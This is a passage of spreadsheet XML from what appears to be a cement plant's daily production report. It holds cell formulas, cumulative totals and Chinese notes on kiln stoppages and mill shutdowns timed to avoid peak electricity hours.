        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]8'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]8'!$M$21+'[14]8'!$M$22+'[14]8'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]8'!$N$21+'[14]8'!$N$22+'[14]8'!$N$35</f>
        <v>162.11</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'7'!U53</f>
        <v>425.67</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>38760.097</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]8'!$Q$21+'[14]8'!$Q$22+'[14]8'!$Q$35</f>
        <v>102</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'7'!X53</f>
        <v>457</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>39948</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]8'!$T$21+'[14]8'!$T$22+'[14]8'!$T$35</f>
        <v>1617.617</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]8'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'7'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]8'!$I$47</f>
        <v>1390.45</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'7'!K54</f>
        <v>9202.682</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>220644.532</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]8'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]8'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]8'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]8'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'7'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]8'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'7'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]8'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]8'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'7'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]8'!$I$63</f>
        <v>112.75</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'7'!K55</f>
        <v>1341.066</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>36776.716</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]8'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]8'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]8'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]8'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]8'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]8'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]8'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]8'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]8'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'7'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'7'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]8'!$Q$62</f>
        <v>1#窑:正常。2#窑:续停。水泥磨:1#磨：10:00-22:20避峰停机；2#磨：10:00-22:10避峰停机；3#磨：9:00-24:00大修停机；4#磨：0:00-22:10续停。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G57+'7'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'7'!K57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G58+'7'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'7'!K58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G59+'7'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'7'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]8'!$Q$65</f>
        <v>窑:正常。A组磨：8:50-17:10避峰停机。D1#磨：16:00-24:00避峰停机，D2#磨：16:00-24:00避峰停机。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G60+'7'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'7'!K60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'[14]8'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]8'!$E$6</f>
        <v>5250</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'7'!H61</f>
        <v>30155</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1146028</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]8'!$E$21</f>
        <v>4496.14</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'7'!K61</f>
        <v>30721.51</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1131881.59</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]8'!$H$6</f>
        <v>37202.6599999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>71.5435769230767</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'[14]8'!$M$11+'[14]8'!$M$12+'[14]8'!$M$13+'[14]8'!$M$14+'[14]8'!$M$15+'[14]8'!$M$16+'[14]8'!$M$17+'[14]8'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]8'!$N$11+'[14]8'!$N$12+'[14]8'!$N$13+'[14]8'!$N$14+'[14]8'!$N$15+'[14]8'!$N$16+'[14]8'!$N$17+'[14]8'!$N$18</f>
        <v>3283</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'7'!H62</f>
        <v>18023</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>854016.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]8'!$Q$11+'[14]8'!$Q$12+'[14]8'!$Q$13+'[14]8'!$Q$14+'[14]8'!$Q$15+'[14]8'!$Q$16+'[14]8'!$Q$17+'[14]8'!$Q$18</f>
        <v>3610</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'7'!K62</f>
        <v>21330</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>855802.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]8'!$T$11+'[14]8'!$T$12+'[14]8'!$T$13+'[14]8'!$T$14+'[14]8'!$T$15+'[14]8'!$T$16+'[14]8'!$T$17+'[14]8'!$T$18</f>
        <v>15147.634</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>60.5905359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]8'!$Q$71</f>
        <v>窑:续停。水泥磨:续停。</v>
      </c>
      <c r="R62" s="272"/>
      <c r="S62" s="272"/>
      <c r="T62" s="272"/>
      <c r="U62" s="272"/>
      <c r="V62" s="272"/>
      <c r="W62" s="272"/>
      <c r="X62" s="272"/>
      <c r="Y62" s="272"/>
      <c r="Z62" s="273"/>
    </row>
    <row r="63" ht="15.75" customHeight="1" spans="1:26">
      <c r="A63" s="191"/>
      <c r="B63" s="193"/>
      <c r="C63" s="193"/>
      <c r="D63" s="193" t="s">
        <v>284</v>
      </c>
      <c r="E63" s="194"/>
      <c r="F63" s="194">
        <f>'[14]8'!$M$19+'[14]8'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]8'!$N$19+'[14]8'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'7'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]8'!$Q$19+'[14]8'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'7'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]8'!$T$19+'[14]8'!$T$20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G64+'7'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'7'!K64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G65+'7'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'7'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]8'!$Q$74</f>
        <v>1#窑:续停；2#窑:续停；1#磨:9:30-22:15避峰停机。2#磨:9:45-22:00避峰停机。3#磨:8:00-24:00避峰停机。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G66+'7'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'7'!K66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G67+'7'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'7'!K67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'[15]8'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]8'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'7'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]8'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'7'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]8'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]8'!$Q$77</f>
        <v>1#磨16:30-23:30避峰停机:7小时(避峰)。2#磨16:30-22:15避峰停机:6.25小时(避峰)。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]8'!$D$43+'[15]8'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]8'!$E$43+'[15]8'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'7'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]8'!$H$43+'[15]8'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'7'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]8'!$K$43+'[15]8'!$K$44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'[15]8'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]8'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'7'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]8'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'7'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]8'!$K$45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G71+'7'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'7'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]8'!$Q$80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G72+'7'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'7'!K72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G73+'7'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'7'!K73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G74+'7'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'7'!K74</f>
        <v>0</v>
      </c>
      <c r="L74" s="194">
        <f>K74+yc!L74</f>
        <v>0</v>
      </c>
      <c r="M74" s="194"/>
      <c r="N74" s="195"/>
      <c r="O74" s="263"/>
      <c r="P74" s="278" t="s">
        <v>311</v>
      </c>
      <c r="Q74" s="271" t="str">
        <f>'[8]8'!$Q$83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G75+'7'!H75</f>
        <v>0</v>
      </c>
      <c r="I75" s="194">
        <f>H75+yc!I75</f>
        <v>0</v>
      </c>
      <c r="J75" s="241">
        <f>J76</f>
        <v>0</v>
      </c>
      <c r="K75" s="194">
        <f>J75+'7'!K75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G76+'7'!H76</f>
        <v>0</v>
      </c>
      <c r="I76" s="194">
        <f>H76+yc!I76</f>
        <v>0</v>
      </c>
      <c r="J76" s="241">
        <f>SUM(J77:J78)</f>
        <v>0</v>
      </c>
      <c r="K76" s="194">
        <f>J76+'7'!K76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G77+'7'!H77</f>
        <v>0</v>
      </c>
      <c r="I77" s="194">
        <f>H77+yc!I77</f>
        <v>0</v>
      </c>
      <c r="J77" s="241"/>
      <c r="K77" s="194">
        <f>J77+'7'!K77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G78+'7'!H78</f>
        <v>0</v>
      </c>
      <c r="I78" s="194">
        <f>H78+yc!I78</f>
        <v>0</v>
      </c>
      <c r="J78" s="241"/>
      <c r="K78" s="194">
        <f>J78+'7'!K78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'[16]8'!$E$7</f>
        <v>480.06</v>
      </c>
      <c r="H79" s="194">
        <f>G79+'7'!H79</f>
        <v>4164.58</v>
      </c>
      <c r="I79" s="301">
        <f>H79+yc!I79</f>
        <v>151293.05</v>
      </c>
      <c r="J79" s="301">
        <f>'[16]8'!$I$7</f>
        <v>454</v>
      </c>
      <c r="K79" s="194">
        <f>J79+'7'!K79</f>
        <v>4262.5</v>
      </c>
      <c r="L79" s="301">
        <f>K79+yc!L79</f>
        <v>146153.95</v>
      </c>
      <c r="M79" s="301">
        <f>'[16]8'!$L$7</f>
        <v>4786.86</v>
      </c>
      <c r="N79" s="302">
        <f>M79/50000*100</f>
        <v>9.57372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'[16]8'!$R$15</f>
        <v>0</v>
      </c>
      <c r="H80" s="194">
        <f>G80+'7'!H80</f>
        <v>0</v>
      </c>
      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]8'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'7'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]8'!$Y$15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G81+'7'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'7'!K81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G82+'7'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'7'!K82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G83+'7'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'7'!K83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G84+'7'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'7'!K84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G85+'7'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'7'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="H32"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9/31</f>
        <v>0.290322580645161</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>46000</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20174.62</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'8'!H5</f>
        <v>191467.01</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6346333.04</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>24479.793</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'8'!K5</f>
        <v>206605.749</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6356676.88</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>252329.085</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>67.4676697860962</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]9'!$W$101</f>
        <v>268.875</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]9'!$X$101</f>
        <v>271.481481481481</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]9'!$Y$101</f>
        <v>260.398765103525</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]9'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]9'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]9'!$V$101</f>
        <v>65.5893950437318</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]9'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]9'!$R$101</f>
        <v>216</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]9'!$S$101</f>
        <v>5399.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]9'!$D$23+'[11]9'!$D$17+'[12]9'!$D$17+'[13]9'!$D$25+'[14]9'!$D$8+'[14]9'!$D$15+'[15]9'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]9'!$E$23+'[11]9'!$E$17+'[12]9'!$E$17+'[13]9'!$E$25+'[14]9'!$E$8+'[14]9'!$E$15+'[15]9'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'8'!H6</f>
        <v>2107</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>278456.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]9'!$I$23+'[11]9'!$I$17+'[12]9'!$I$17+'[13]9'!$I$25+'[14]9'!$E$23+'[14]9'!$E$30+'[15]9'!$H$7</f>
        <v>663.97</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'8'!K6</f>
        <v>6450.17</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>268647.87</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]9'!$L$23+'[11]9'!$L$17+'[12]9'!$L$17+'[13]9'!$L$25+'[14]9'!$H$23+'[14]9'!$H$30+'[15]9'!$K$7</f>
        <v>27769.67</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]9'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]9'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]9'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]9'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]9'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]9'!$V$102</f>
        <v>34.5626700680272</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]9'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]9'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]9'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]9'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]9'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'8'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]9'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'8'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]9'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]9'!$W$107</f>
        <v>121.386306001691</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]9'!$X$107</f>
        <v>126.388474913065</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]9'!$Y$107</f>
        <v>131.715569510611</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]9'!$T$107</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]9'!$U$107</f>
        <v>46.5972222222222</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]9'!$V$107</f>
        <v>31.4149659863945</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]9'!$Q$107</f>
        <v>11.83</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]9'!$R$107</f>
        <v>100.65</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]9'!$S$107</f>
        <v>2586.08</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]9'!$D$27+'[11]9'!$D$18+'[13]9'!$D$26+'[14]9'!$D$10+'[14]9'!$D$17+'[15]9'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]9'!$E$27+'[11]9'!$E$18+'[13]9'!$E$26+'[14]9'!$E$10+'[14]9'!$E$17+'[15]9'!$E$9</f>
        <v>1430</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'8'!H8</f>
        <v>18624</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>544160.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]9'!$I$27+'[11]9'!$I$18+'[13]9'!$I$26+'[14]9'!$E$25+'[14]9'!$E$32+'[15]9'!$H$9</f>
        <v>2506.07</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'8'!K8</f>
        <v>22586.98</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>530331.69</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]9'!$L$27+'[11]9'!$L$18+'[13]9'!$L$26+'[14]9'!$H$25+'[14]9'!$H$32+'[15]9'!$K$9</f>
        <v>37916.92</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]9'!$W$108</f>
        <v>134.825425246195</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]9'!$X$108</f>
        <v>129.667519181586</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]9'!$Y$108</f>
        <v>127.523482603948</v>
